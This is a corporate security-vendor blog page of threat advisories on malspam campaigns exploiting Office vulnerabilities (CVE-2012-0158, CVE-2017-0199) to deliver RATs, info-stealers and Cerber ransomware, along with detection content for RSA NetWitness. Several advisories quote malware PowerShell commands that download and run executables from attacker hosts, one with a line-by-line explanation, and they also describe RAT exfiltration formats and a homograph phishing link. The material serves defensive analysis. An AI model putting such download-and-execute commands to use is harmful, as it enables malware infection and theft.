Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > Author: Rajas Save

RSA NetWitness Platform

13 Posts authored by: Rajas Save Employee

On February 1st 2018, malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a Buffer Overflow Vulnerability in the ListView / TreeView ActiveX controls in the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code can be triggered by a specially crafted DOC or RTF file for un-patched MS Office products.

 

 

 

VirusTotal Analysis of delivery document paymentorder.doc confirms presence of RTF exploit.

 

 

After opening the document in a vulnerable Microsoft Word application, a connection is established to “pgamix[.]com” to download a malicious executable payload, using shell code present in RTF file,  which kicks off the following network events.

 

 

VirusTotal Analysis of final payload “babawire.jar” confirms that it’s Adwind, a Java based Remote Access Trojan (RAT). Adwind RAT is a multifunctional malware program and it is distributed through a single malware-as-a-service platform.

 

This file is a compressed stream containing 168 files. It imports multiple java packages required for execution of the Trojan.

 

 

 

Current RSA NetWitness detection populates following meta for the download sessions:

 


 

Although we didn't achieve a full detonation in our own sandbox, post-infection traffic from  Malware-Traffic-Analysis.net populates following meta for the download sessions with Current RSA NetWitness detection:

 

 

 

More detailed information about CVE-2012-0158 can be found here:

Triaging Malicious Microsoft Office documents CVE-2012-0158 

 

Thanks go to Kevin Stear and Ahmed Sonbol for contributing to this threat advisory.

 

 

 

References:

On October 18th 2017, malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a Buffer Overflow Vulnerability in the ListView / TreeView ActiveX controls in the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code can be triggered by a specially crafted DOC or RTF file for un-patched MS Office products.

VirusTotal Analysis of delivered document confirms presence of RTF exploit.

 

After opening the document in a vulnerable Microsoft Word application, a connection is established to  “http://careers[.]fwo[.]com[.]pk/” to download a malicious executable payload, using shell code present in RTF file,  which kicks off the following network events.

 

VirusTotal Analysis of final payload “printer.exe” confirms that it’s a Revenge, a Remote Access Trojan (RAT).

 

Once the download is complete, the binary is executed and post-infection traffic started. Request contains information in Base64 encoded form about infected m/c such as IP, domain and username, operating system, processor version and speed and language.

 

Breaking down request to each staring reveals specific pattern and information:

  • Information
  • Revenge-RAT R3Vlc3Q Guest
  • Revenge-RAT XzQ0RkVDOTA4 _44FEC908
  • Revenge-RAT 10.10.10.166 System IP
  • Revenge-RAT Q0FGRVdFU1QgLyBqYW1lcw CAFEWEST / james
  • Revenge-RAT No 6
  • Revenge-RAT TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgIDMy Microsoft Windows 7 Professional  32
  • Revenge-RAT SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIFg1NjkwICBAIDMuNDdHSHo Intel(R) Xeon(R) CPU           X5690  @ 3.47GHz
  • Revenge-RAT 1073274880
  • Revenge-RAT Ti9B N/A
  • Revenge-RAT Ti9B N/A
  • Revenge-RAT 3339
  • Revenge-RAT UHJvZ3JhbSBNYW5hZ2Vy Program Manager
  • Revenge-RAT ZW4tVVM en-US
  • Revenge-RAT False

 

Current RSA NetWitness detection populates following meta for the download sessions:

 

Current RSA NetWitness detection populates following meta for Post Infection traffic:

 

More detailed information about CVE-2012-0158 can be found here:

Triaging Malicious Microsoft Office documents CVE-2012-0158 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On October 19th 2017, an unknown malspam campaign delivered a malicious RTF document, “Inquiry_list.doc”, which attempts to exploit Microsoft Office/WordPad via a Remote Code Execution (RCE) vulnerability in the Windows API, CVE-2017-0199.  

 

 

After opening the document via a vulnerable Microsoft Word application, a connection is established to “wizkiddz[.]xyz” to download a malicious DOT file, "dotenq.dot", which kicks off the following network events.

 

This DOT file contains obfuscated code, which downloads a malicious HTA, “htaenq.hta”, from same domain.

 

This HTA file then uses Base64 obfuscated code to spawn powershell and create a shell object in order to download the final payload, “enq.exe”, and then close the browser window automatically.


 

This final payload, “enq.exe”, is a Fareit Trojan, a commodity malware info-stealer often seen with Zeus/ZBOT campaigns.

 

Current RSA NetWitness detection populates following meta for the download sessions:

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Current RSA NetWitness detection populates following meta for Post Infection traffic:

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On October 10th, 2017 malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a Buffer Overflow Vulnerability in the ListView / TreeView ActiveX controls in the MSCOMCTL.OCX library, CVE-2012-0158. The malicious code can be triggered by a specially crafted DOC or RTF file for un-patched MS Office products.

 

VirusTotal Analysis of delivered document confirms presence of RTF exploit.

 

After opening the document in a vulnerable Microsoft Word application, a connection is established to  “shalomreal.com/111.118.180.181” to download a malicious HTA file, which kicks off the following network events.

 

As shown above, " p4573447474794872248.hta" (VirusTotal  and Hybrid-Analysis) was the first download.

This HTA file uses obfuscated code which when rendered creates a PowerShell command. It also creates Shell Object which helps download and execute final payload executable “gd.exe” and has code to close browser window automatically.

 

Above obfuscated charterer leads to generation of following PowerShell command which uses WebClient object for connectivity:

 

powershell (new-object System.Net.WebClient).DownloadFile('hXXp://dvayen[.]com/fgg/gd[.]exe', '%temp%\BxQ2QIVm0dfJEQ0XbjTisddC0lm.exe'); Start-Process '%temp%\BxQ2QIVm0dfJEQ0XbjTisddC0lm.exe'", "", "", 0

 

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Banners in post infection traffic are identified DrakComet RAT banners. VirusToatal Analysis of the payload, “gd.exe”, and Analysis of post infection traffic confirms that it is DarkComet, a Remote Access Trojan (RAT).

 

Current RSA NetWitness detection populates following meta for the download sessions:

 

Current RSA NetWitness detection populates following meta for Post Infection traffic:

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On October 3rd, 2017 malspam delivered a malicious MS Word document containing obfuscated VBA code, which acts as Trojan Downloader with known signature “W97M”.  

 

Submitting the delivery document to RSA's pre-release What’s This File service returns a 100 threat score.

 

If a user enables the embedded macro, VBA code runs to initiate a cmd process, which executes PowerShell to download and execute a Visual Basic Script (VBS) payload from known malicious domain “a[.]pomf[.]cat”.

 

PowerShell then calls a WScript shell to connect to a domain via WebClient object and download and silently execute its payload.  While the follow-on network activity is SSL encrypted, captured network activity (prior to encryption) shows the HTTP request for the initial VBS payload.

 

Analysis of dropped files and post infection traffic both confirm that the payload is H-worm, a Remote Access Trojan (RAT).  H-worm is a VBS based RAT written by an individual going by the name Houdini.  It shares same code base with njw0rm and njRAT/LV, and has in years past been previously seen targeting the energy industry. Common delivery mechanisms include spam email attachments and malicious links.

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

RSA NetWitness evaluation of network traffic shows the malware exfiltrating information via the User-Agent field in the HTTP Header, specifically:

    {DiskVolumeSerial}<|>{Hostname}<|>{Username}<|>{OS}<|>plus<|>{AVProductInstalled or nan-av}<|>{USBSpread: true or false} - {CurrentSystemDate}

 

 

Current RSA NetWitness detection populates the following meta for the post infection traffic:

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 

On September 27th, malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a Remote Code Execution (RCE) Vulnerability in the Windows API, CVE-2017-0199.

VirusTotal Analysis of delivered document confirms presence of RTF exploit.

 

After opening the document in a vulnerable Microsoft Word application, users are warned that the document is attempting to download externally linked files.

 

Upon clicking "Yes", and a direct to IP connection to 173.44.42[.]164 is established and the following network events take place.

  

As shown above, "3Pxi69djmwiIKmc.hta" (VirusTotal and Hybrid-Analysis) was the first download.  This file creates two XMLHTTP objects using VBScript which helps to connect and download VBS file which acts as Trojan Downloader.  It also creates Shell object to execute HTA file as Internet Explorer Application.

 

Next, a VBS script, "Km1Dizoq3Jxz.vbs", (VirusTotal  and Hybrid Analysis) uses obfuscated code to create paths from which executable “UvnG1Oz9d0.exe” is downloaded and executed.

 

In the same session, "nJwsm39La.html” then deletes both the VBS and executable file.

 

VirusToatal Analysis of the payload, “UvnG1Oz9d0.exe”, (VirusTotal  and Hybrid-Analysis) confirms that it is Quasar Spyware, a Remote Access Trojan (RAT).

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Current RSA NetWitness detection populates following meta for the download sessions:

 

You can also check FirstWatch recent threat advisory on the recent uptick in malspam attempting to exploit CVE-2017-0199, Malspam and CVE-2017-0199

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

On September 6th, malspam delivered a malicious RTF document that tries to exploit Microsoft Office/WordPad via a remote code execution (RCE) Vulnerability in the Windows API, CVE-2017-0199 [1][2]. This document has been spotted in-the-wild travelling as an email attachment with different names; one of which is “Remittance details.doc” (VirusTotal analysis).  

 

 

 

Opening the document in a vulnerable Microsoft Word application led to the following network events:

 

Below is a breakdown of the network activity.  First "blabla.hta" (VirusTotal and Hybrid-Analysis) was downloaded; this file contains an obfuscated script with a powershell command.  

  

Next the powershell command runs and downloaded an executable, “halizeuskins.exe” (VirusTotal and Hybrid-Analysis). 

 

Once the download is complete, the binary is executed and post-infection traffic started.

 

Current RSA NetWitness detection populates following meta for the download sessions:

 

For communication with the C2 domain, the following meta was populated for those sessions in NetWitness Packets:

 

Pivoting off the registration information of the C2 domain "reedling.com[.]ng", FirstWatch found a group of domains registered using the same e-mail address (see appendix).

 

Some of those domains are associated with different malware samples (see appendix). The post-infection network behavior of one of them (SHA256:e078e842c1006c972a65dcb71cf6ae5b38ba5074ea19f999f9879e8ec73a65f2) is similar to the one under our investigation. VirusTotal analysis results for that sample suggest it is a Zbot variant.

 


  

More information about Zbot variants and their detection using RSA NetWitness Suite:

 

You can also check FirstWatch recent threat advisory on the recent uptick in malspam attempting to exploit CVE-2017-0199,
Malspam and CVE-2017-0199 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 

References:

During this 3rd quarter of 2017, several malspam campaigns have been successfully distributing the Hancitor Downloader.  The dropper uses strategies and obfuscation techniques on infected PCs, and has been observed delivering a variety of payloads.  

 

The early August "Shipment Arrived" malspam campaign masquerades as a FedEx shipment delivery notice and attempts to trick victims into clicking a link to download the invoice document which contains malicious macros.  This variant uses native API calls within Visual Basic code to carve out and decrypt embedded malware from malicious Word documents. In this case the payload is Zbot.

 

 

Once clicked on link, following word document gets downloaded. 

 

 

VirusTotal Analysis of Fedex_Invoice_598791.doc : 

 

 

Submitting the delivery document to What's This File service shows more information about the malicious word document.

 

 

This activity is captured in the process tree below, which downloads and executes the payload:

 

 

VirusTotal Analysis of the dropped file confirms that it’s Zbot Malware delivered by Hancitor: 

 

 

More information about Zbot variants detection and RSA FirstWatch feed :

 

 Current RSA NetWitness detection populates following meta:

  

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

  

 

Reference:

During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.

 

 

Submitting the delivery document to What's This File service shows more information about the malicious word document.

 

 

This activity and more is also captured in the process tree below shows the series of events that led to downloading and executing a Cerber payload:

 

 

The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:

 

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

 

Line-By-Line analysis of PowerShell Command:

powershell.exe

  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods,which substantially increase the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = ‘http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + ‘\’ + $name + ‘.exe’;

  • The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder. 

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;}break;}

  • Executing downloaded fine and if the command failed to return a process and continued silently, the window remains hidden and the process breaks.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.

 

In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe". It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.   

 

 

VirusTotal analysis of the dropped file confirm it’s Cerber Ransomware:

 

 

Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.

 

 

Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 

 

 

Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.

 

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, Please check the following RSA Link articles:

 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 

References:

 

Cerber Ransomware has again taken the cyber world by storm by taking over 87% share in terms of cyber-attacks in 1st Quarter of 2017, and it remains the most profitable ransomware in the market for close to a year now.  Now a little over a year after its first variants were found in the wild, Cerber developers have released their 6th edition codebase, which boasts a slew of new of improvements.  

 

Specifically Cerber has added new encryption patterns, and anti-VM and anti-sandboxing features, which have raised the bar for researchers (and also automated systems) to detonate and identify the new ransomware.  These new features combined with varied distribution channels show that the Cerber crew is taking ransomware development to the next level, making it by far the most dangerous ransomware on the market today.

 

Here is some of the previous research from RSA about Cerber Ransomware and its Evolution:

 

The following chart shows features of different Cerber versions:

 

 

Cerber v1, v2 and v3

Cerber v4

Cerber v5

Cerber SFX

Cerber v6

File Type

EXE

EXE

EXE

SFX (Loader) VBS, DLL

EXE

Exceptions (Cerber doesn’t execute if it detects certain components in the system)

Language in v1 and v3*

Language and antivirus (AV) for v2*

Language*

Language*

AV, VM, Sandbox (Loader*), and Language*

Language*

Anti-AV Routine

None

None

None

None

EXE files of AV, Firewall and Antispyware products set to be blocked by Windows firewall rules*

Anti-sandbox

None

None

None

VM and Sandbox (Loader*)

VM and Sandbox (Loader*)

Backup Deletion

Yes (vsadmin, WMIC, BCDEdit)*

Yes (WMIC)*

Yes (WMIC)*

 

Removed in v5.02

 Varies (some samples have backup deletion capabilities)

Varies (some samples have backup deletion capabilities)

Exclusion List 
(directories and file types Cerber doesn’t encrypt)

Folder and file*

Folder and file*

Folder and file*; and AV, Antispyware, and Firewall directories

Folder and file*; and AV, Antispyware, and Firewall directories

Folder and file*

*Cerber RaaS Configurable

 

Exploit kits and Malspam emails are the two major delivery vectors for Cerber today. In the case of exploit kits, a compromised site or malvertising often redirects victims to a malicious landing page that downloads and executes a payload.  With regard to malspam, a victim is typically tricked (and clicks on a link) to download and run js, ps1 or sfx files, which eventually inject and execute the ransomware payload. 

Following diagram shows delivery of Cerber in brief:

  

 

Until May 2017, Cerber was heavily using RigEK over malspam campaigns to deliver Cerber infections; yet, after combined efforts of researchers and domain registrar, GoDaddy, a massive amount of Rig-related shadow domains were taken down during Operation Shadowfall. Post Shadowfall, the group’s distribution vector changed over to more malspam-centric campaigns for delivering the Cerber payload. The delivery of Cerber via the ‘Blank Slate’ campaign in 2nd quarter of 2017is evidence to this fact, and a diagram of the infection vector is below.

 

 

‘Blank Slate’ delivery is through spam emails with subjects like “Unusual Sign-In Activity”, “Chrome Update”, “Delivery Invoice” etc.  Unwitting victims are tricked into clicking on a link provided or button to download a zip file, which on extraction injects a .js, .doc, or .ps1 script to download and install the Cerber payload.

 

  

 

 

 

RTF file with Macros are also used to trigger ransomware delivery, and a great explanation of both RTF and the recent MS 2017-10 zero day can by RSA’s own Kevin Douglas can be found here

 

 

 

New variants of Cerber also show some different but unique patterns in post exploitation traffic. UDP beaconing ports are changed along with some new payment site alias hosts. After April 2017, Cerber payment sites, patterns and UDP port (which is now 6893, previously 6892) changed.

RSA Netwitness Live Content for detection can detect newest variants of Cerber beaconing.  An updated Event Stream Analysis (ESA) rule looks for a spray of outbound suspected command and control (C2) traffic via UDP to port 6892, 6893 from a single source IP to multiple destinations IPs (within the same netblock).

 

 

 

NetWitness Packet also has an application rule that detects Cerber pay-site patterns, correlating on the ransomware’s embedded configuration files for the set up of bitcoin wallets for each victim. This rule matches when the 'alias.host' (packet) or 'fqdn' (web logs) begins with one of the identified pay-sites.

Meta Keys:

  • Risk Warning = cerber ransomware
  • Indicators of Compromise = cerber ransomware

 

 

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

 

 

Thanks goes to Kevin Stear for contributing to this threat advisory.

 

 

 

References:

Many cyber threats have already been identified, and RSA NetWitness has been actively delivering content related to these identified threats. The content required to hunt these threats are in the form of different resource types such as feeds, parsers, application rules and so on.

The RSA NetWitness Known Threats Pack enables analysts to deploy all the content required to identify and hunt known threats efficiently. The Known Threats pack contains a set of content specific to known identified threats such as malware, crimeware, RAT campaigns, and so on.  When the pack is deployed, all the content with dependencies is automatically deployed. Analysts can then efficiently hunt previously known threats and keep track of known malicious IPs, domains and potentially compromised systems on the network.

 

Deployment:

You can deploy all of the items in the Known Threat Pack through Live. To deploy:

From the Security Analytics menu, click Live > Search.

In the Resource Type field, select Bundle.

 

Select the Known Threat Pack.

   You can view the details page if you wish:

 

 

 

Select Deploy, then follow the steps in the wizard.

The Deployment Wizard lists the resources that are in the bundle.

 

Select the service or services on which to deploy the bundle.

 

Review your selections.

 

Click Deploy. Progress is shown in the dialog box, until completion.

 

Click Close to exit the wizard.

 

 

Threat Hunting and Investigation:

With all required content deployed to hunt known threats, analysts can now start looking for alerts, anomalous network activity and meta generated using various LUA parsers and rules.  Keys to look for to start hunting and drilling down on to validate the alerts are Indicator of Compromise, Behaviors of Compromise, Enablers of Compromise, Session Analysis, Service Analysis, File Analysis and investigation meta. In depth protocol analysis which involves looking at headers user agents, host-names aliases and request codes will help further validating the alerts. More about this: Hunting guide - https://community.rsa.com/docs/DOC-62341

 

 

Investigation meta is used to provide a means to classify all logs and sessions in support of investigations and remediation. This is useful for front line analysts, because it minimizes the time dedicated to mining logs or sessions in support of their findings. More about this: https://community.rsa.com/docs/DOC-62303

 

 

 

Updates:

As new threats are identified, content related to those threats will be added to the Known Threats Pack. Monitoring changes periodically and deploying new content via Known Threat Pack will be help identifying and hunting latest threats in the cyber world.

 

Thanks to Michael Sconzo, Angela Stranahan, Raymond Carney, Erik Heuser, Theresa Berardinelli, Scott Marcus and Jim Ward for their contribution.

 

 

References:

Known Threats Pack Documentation: https://community.rsa.com/docs/DOC-76524       

Hunting Guide: https://community.rsa.com/docs/DOC-62341

Investigation feed Documentation: https://community.rsa.com/docs/DOC-62303           

PunyCode is a special encoding used to convert Unicode characters to ASCII, which is a smaller, restricted character set and used to encode internationalized domain names (IDN) [1]. PunyCode is a way to represent Unicode within the limited character subset of ASCII used for Internet host names. For example, "München" (German name for the city of Munich) would be encoded as "Mnchen-3ya". Using PunyCode, host names containing Unicode characters are transcoded to a subset of ASCII consisting of letters, digits, and hyphen (the Letter-Digit-Hyphen (LDH) subset, as it is called)[2].

 

There exist non-Latin character sets which contain code points (characters) that, when displayed, look like Latin code points:

ASCII 0x61 -> a

Unicode U0430 -> a (0x0430 if UTF16, but 0xd0b0 if UTF8)

A name consisting of characters that look like Latin characters is a different name than if it consisted of Latin characters.

xn--80ak6aa92e -> 0xd0b0d180d180d38fd0b5

0xd0b0 (UTF8 U430) -> "a" (Cyrillic small letter "a")

0xd180 (UTF8 U440) -> "p" (Cyrillic small letter "er")

0xd180 (UTF8 U440) -> "p" (Cyrillic small letter "er")

0xd38f (UTF8 U4CF) -> "ӏ" (Cyrillic small letter "palochka")  ...and so on...

 

Byte sequences like 0xd0b0, 0xd180, et al can't be used in things like domain names, etc.  The RFC 3492 document defines a general algorithm called Bootstring that allows a string of basic code points to uniquely represent any string of code points drawn from a larger set. PunyCode is an instance of Bootstring that uses particular parameter values specified by this document, appropriate for IDN.

 

This threat advisory discusses how to detect IDN homograph Phishing attacks using RSA NetWitness Logs & Packets.

   

PunyCode Detection using IDN_homograph Parser

IDN_homograph lua parser detects punyCode-encoded internationalized domain names which use non-Latin Unicode code points whose glyphs resemble those of Latin Unicode code points and registers the decoded homograph as analysis.service meta.

  • service - host as which the homograph is masquerading
  • ioc - indicators of compromise - homograph detected

 

IDN_homograph lua parser is now available on RSA Live:

 

 

 

 

Host aliases encoded with PunyCode:

 

 

Meta registered in RSA NetWitness Investigation:

  • host: www.xn--80ak6aa92e.com
  • ioc: homograph detected
  • service: www.apple.com

 

Below is screenshot of IDN_homograph parser detecting IDN homograph attacks:

 

 

Detection of homographs used in Phishing Emails

 

If an email contains: <a href="http://www.xn--80ak6aa92e.com">http://www.apple.com</a>

Then Phishing_lua parser will register:  risk.warning - href host doesn't match displayed host as well as the same IDN meta from IDN_homograph as above.

If an email contains: <a href="http://www.xn--80ak6aa92e.com">http://www.xn--80ak6aa92e.com</a>

Then there is no mismatch, but the host will still be registered from Phishing_lua parser, and the same IDN detection will be

done by IDN_homograph parser.

 

 

 

Event Stream Analysis for Detecting PunyCode Phishing Attempts

 

Event Stream Analysis (ESA) rule identifies mail sessions that have a PunyCode hostname and also have a mismatch between the hostname in a link (href) and the text in the same link containing an IDN homograph.  This suspected phishing attempt is then followed by HTTP(S) traffic with the same hostname in the certificate or in the host.

 

 

ESA rule will alert based on presence on PunyCode in emails, which is detected using ioc’s and analysis_service meta generated from IDN_homograph and mail protocol parsers. It also does looks for sessions on which uses same alias host over HTTP(S).

 

 

Event Stream Analysis Rule for PunyCode Phishing Attempt is now available on RSA Live:

 

 

 

 

Thanks goes to Sean LimWilliam Motley and Angela Stranahan for contributing to this threat advisory.

 

References:

  1. IDN converter: https://www.punycoder.com/
  2. https://en.wikipedia.org/wiki/Punycode

The RSA NetWitness Malware Activity report enables customers to identify malware activity across packets and logs in their infrastructure. This report uses new investigation meta to identify malicious activity and represent it in consolidated and informative tabular structure which makes overall investigation experience more targeted and efficient.

The Malware Activity report displays traffic that has been communicating with a known malicious IP address or hostname. With consolidated information about all malware related network activity, it’s easier to identify infected host(s) on the network. It is based on meta generated using RSA feeds like investigation category, investigation context etc.

This report is divided in three categories based on traffic:

  • Malware Activity Web for malware related web-based packet and log traffic.
  • Malware Activity DNS for DNS packet traffic that is going to a known malicious IP address or hostname
  • Malware Activity Unidentified for all malware related packet and log traffic other than DNS and Web that has been known malicious

 

Malware Activity Web

 

Malware Activity DNS

 

Malware Activity Unidentified

 

Once the report is deployed and scheduled, analysts can keep track of hosts connecting to outside servers which are known malicious or suspicious. Looking at source and destination IPs with the information of service type and amount of data flown, analyst can detect potential compromise and data leak from a particular host. Using this report, analysts now have visibility to network packet and log related activity for a compromised host that is showing indicators of malware activity.

 

Thanks to Angela Stranahan, Mike Sconzo, Tery Berardinelli and Jim Ward for their contributions.

 

RSA Security Analytics Reports is documented at https://community.rsa.com/docs/DOC-43406

RSA Security Analytics Rules are documented here https://community.rsa.com/docs/DOC-43419

Filter Blog

By date: By tag: